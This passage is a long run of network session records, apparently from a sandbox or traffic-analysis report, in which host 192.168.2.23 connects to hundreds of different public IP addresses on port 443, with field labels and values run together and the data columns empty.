                                                14845192.168.2.2345174193.125.157.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14846192.168.2.2339148101.191.210.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14847192.168.2.2333898118.159.66.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14848192.168.2.2347264139.58.95.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14849192.168.2.235402617.188.63.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14850192.168.2.2349190123.224.82.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14851192.168.2.233548058.143.137.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14852192.168.2.2359874129.15.177.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14853192.168.2.2339692152.39.2.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14854192.168.2.23591044.254.37.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14855192.168.2.2354832117.141.89.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14856192.168.2.233989413.221.93.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14857192.168.2.2337820104.142.18.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14858192.168.2.2344378116.52.219.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14859192.168.2.234228446.1.72.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14860192.168.2.235364659.78.17.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14861192.168.2.235692849.109.78.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14862192.168.2.2333536141.145.146.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14863192.168.2.2335686217.183.71.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14864192.168.2.235819441.87.170.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14865192.168.2.2348466164.62.165.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14866192.168.2.235925867.187.0.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14867192.168.2.235794491.80.0.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14868192.168.2.234650217.26.78.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14869192.168.2.235289873.177.235.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14870192.168.2.2339098188.2.1.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14871192.168.2.234653492.136.18.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14872192.168.2.2341298134.92.83.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14873192.168.2.234155437.133.15.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14874192.168.2.23495929.105.211.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14875192.168.2.2344170177.9.198.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14876192.168.2.2349818138.246.17.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14877192.168.2.23476769.1.171.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14878192.168.2.2337670196.113.207.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14879192.168.2.2350650148.164.11.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14880192.168.2.2345252208.25.229.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14881192.168.2.235450238.38.15.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14882192.168.2.235412080.250.12.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14883192.168.2.2354756174.137.62.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14884192.168.2.2347472221.235.159.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14885192.168.2.2356968112.25.51.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14886192.168.2.235555086.201.245.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14887192.168.2.234547880.248.117.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14888192.168.2.2357592186.172.228.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14889192.168.2.236059634.203.75.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14890192.168.2.2344934209.21.27.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14891192.168.2.2350846174.160.51.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14892192.168.2.2333392142.165.143.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14893192.168.2.2346958177.97.68.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14894192.168.2.2353004121.218.33.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14895192.168.2.2337162189.179.32.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14896192.168.2.233726470.45.148.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14897192.168.2.233537212.157.37.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14898192.168.2.235805025.80.110.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14899192.168.2.2360116157.209.188.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14900192.168.2.2333088217.178.250.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14901192.168.2.236045413.46.16.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14902192.168.2.234902612.234.74.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14903192.168.2.233999693.31.60.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14904192.168.2.234939088.233.134.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14905192.168.2.2350176140.3.206.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14906192.168.2.2336762137.129.57.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14907192.168.2.2360558150.176.46.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14908192.168.2.235686446.218.50.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14909192.168.2.233370436.171.135.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14910192.168.2.2334272100.158.6.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14911192.168.2.2338394208.5.147.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14912192.168.2.234827299.59.200.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14913192.168.2.2359280219.145.190.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14914192.168.2.234599089.147.65.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14915192.168.2.23392842.130.139.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14916192.168.2.23484908.99.222.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14917192.168.2.2356472158.70.173.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14918192.168.2.2334420132.26.57.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14919192.168.2.2338434137.58.47.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14920192.168.2.235421038.251.225.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14921192.168.2.2360670119.91.109.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14922192.168.2.233727477.236.78.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14923192.168.2.2358092114.208.118.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14924192.168.2.23414644.151.85.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14925192.168.2.2343918105.30.140.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14926192.168.2.2338576172.167.251.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14927192.168.2.2345212177.148.68.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14928192.168.2.2347126114.54.42.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14929192.168.2.234805663.16.88.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14930192.168.2.233964037.8.182.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14931192.168.2.2358540114.194.70.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14932192.168.2.235522673.23.153.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14933192.168.2.2338372111.249.183.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14934192.168.2.2335662216.115.228.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14935192.168.2.2343928203.233.203.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14936192.168.2.2357456110.248.92.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14937192.168.2.2344438140.131.182.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14938192.168.2.2353010213.92.26.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14939192.168.2.234404292.21.251.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14940192.168.2.2340328175.30.246.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14941192.168.2.2335872203.54.182.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14942192.168.2.234669844.89.69.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14943192.168.2.235852285.17.251.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14944192.168.2.2343290151.225.164.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14945192.168.2.2348136167.45.146.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14946192.168.2.2349944110.238.234.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14947192.168.2.23434022.0.80.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14948192.168.2.235102698.80.46.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14949192.168.2.2338246149.240.46.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14950192.168.2.2342132111.204.156.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14951192.168.2.2349726140.134.90.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14952192.168.2.2343942137.48.232.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14953192.168.2.234376077.56.200.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14954192.168.2.2345738113.122.182.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14955192.168.2.2350896162.219.224.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14956192.168.2.2357028180.209.119.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14957192.168.2.2350044218.201.122.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14958192.168.2.2351998173.189.155.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14959192.168.2.235578814.129.110.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14960192.168.2.2351282200.134.234.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14961192.168.2.2350010160.68.67.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14962192.168.2.23429008.211.251.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14963192.168.2.2344714178.195.67.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14964192.168.2.2355794104.21.141.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14965192.168.2.235796441.190.178.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14966192.168.2.2338108161.179.253.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14967192.168.2.23526549.74.192.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14968192.168.2.2340686145.66.191.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14969192.168.2.2342802218.18.176.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14970192.168.2.235050427.110.197.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14971192.168.2.233952471.192.72.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14972192.168.2.2346488200.133.254.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14973192.168.2.2344004162.38.103.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14974192.168.2.234040659.130.173.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14975192.168.2.235677019.171.103.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14976192.168.2.23356061.38.159.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14977192.168.2.234848632.6.172.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14978192.168.2.2350818131.145.28.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14979192.168.2.2334382189.63.27.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14980192.168.2.2357674130.25.185.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14981192.168.2.2333194221.98.212.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14982192.168.2.2339784172.178.105.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14983192.168.2.2353198201.53.212.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14984192.168.2.2344550106.3.87.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14985192.168.2.234555031.64.93.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14986192.168.2.2357874169.199.219.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14987192.168.2.2335976129.185.0.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14988192.168.2.235529238.156.202.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14989192.168.2.2355672138.150.166.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14990192.168.2.2345094122.99.249.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14991192.168.2.2345006185.121.156.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14992192.168.2.233677646.52.29.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14993192.168.2.2337888181.136.85.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14994192.168.2.2349560179.178.242.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14995192.168.2.234717269.232.70.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14996192.168.2.2358466140.18.219.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14997192.168.2.233649267.70.0.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14998192.168.2.235619466.84.117.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14999192.168.2.235212040.11.214.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15000192.168.2.2360258110.140.210.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15001192.168.2.235701062.116.41.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15002192.168.2.2346208195.131.97.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15003192.168.2.2347764171.201.83.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15004192.168.2.2353836152.104.161.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15005192.168.2.2346558157.13.182.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15006192.168.2.2355806120.160.18.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15007192.168.2.2339130208.23.201.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15008192.168.2.2347118132.3.206.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15009192.168.2.2338206216.174.90.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15010192.168.2.2353460188.177.151.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15011192.168.2.2344184141.1.142.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15012192.168.2.2340830154.169.165.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15013192.168.2.2335264180.229.209.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15014192.168.2.233854094.251.96.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15015192.168.2.2332832113.75.87.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15016192.168.2.2347130106.112.207.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15017192.168.2.2354598206.129.59.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15018192.168.2.233987480.16.158.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15019192.168.2.235054651.147.128.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15020192.168.2.2337670152.9.105.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15021192.168.2.234023487.29.38.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15022192.168.2.234641024.249.149.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15023192.168.2.233513466.30.20.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15024192.168.2.2354982193.226.38.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15025192.168.2.234820270.191.132.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15026192.168.2.2356204204.44.219.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15027192.168.2.235808071.215.121.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15028192.168.2.2341772144.132.182.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15029192.168.2.2354140135.57.231.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15030192.168.2.2344470137.83.249.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15031192.168.2.23438149.158.167.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15032192.168.2.2347836143.15.38.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15033192.168.2.233789249.14.144.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15034192.168.2.2344254107.113.155.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15035192.168.2.2347530193.35.200.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15036192.168.2.236086878.171.154.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15037192.168.2.2349910111.233.58.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15038192.168.2.2340928170.239.206.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15039192.168.2.233525296.12.125.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15040192.168.2.234452276.205.214.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15041192.168.2.235063289.5.184.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15042192.168.2.2344614126.34.152.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15043192.168.2.2342544195.155.142.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15044192.168.2.235855261.61.160.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15045192.168.2.2334680208.40.237.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15046192.168.2.235567017.55.73.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15047192.168.2.2333844106.7.71.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15048192.168.2.2348182101.218.199.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15049192.168.2.2345510181.10.29.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15050192.168.2.233955672.219.4.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15051192.168.2.234417260.234.58.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15052192.168.2.2340962115.178.231.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15053192.168.2.2341128194.65.251.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15054192.168.2.2357468103.58.203.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15055192.168.2.2346860134.154.139.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15056192.168.2.2346506203.165.245.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15057192.168.2.2352594138.94.67.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15058192.168.2.235301665.129.168.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15059192.168.2.2356434141.4.41.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15060192.168.2.2353932102.60.142.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15061192.168.2.2358656161.125.116.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15062192.168.2.2333284157.72.52.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15063192.168.2.235820225.61.119.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15064192.168.2.234554692.219.36.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15065192.168.2.234409020.250.220.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15066192.168.2.2359052164.127.17.67443
                                                TimestampBytes transferredDirectionData


